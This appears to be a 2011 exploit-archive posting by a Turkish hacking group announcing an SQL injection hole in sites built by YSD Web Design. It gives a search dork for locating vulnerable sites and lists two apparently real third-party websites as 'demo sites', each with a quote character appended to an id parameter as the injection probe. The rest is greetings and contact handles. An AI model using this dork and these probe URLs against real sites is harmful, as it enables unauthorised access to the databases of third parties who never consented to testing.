YSD Web Design suffers from a remote SQL injection vulnerability.
6edf8fc65414a9538a833e32d7e3de32ab92e2430f71b30040abecf9b7b40463
# Exploit Title: Ysd Web Design Sql Injection Vulnerability
# Date: 20/11/2011 - 03:18
# Author: 3spi0n
# Software Website: http://www.ysd.hk/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File: Changer
[$] Dorks: "Designed by YSD"
[$] Demo Sites:
[~] http://www.business-ecard.com/ecard_popup.php?id=645" [PhpSQLi]
[~] http://www.stevensus.com.hk/product_list.php?category_id=48&id=87"
[PhpSQLi]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Artýk Yansýn Bu Dünya, Umrumda Deðil !
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne
# Greetz: DarkDevilz.in - 3spi0n.net
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Y2J ZyX x-Leader
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>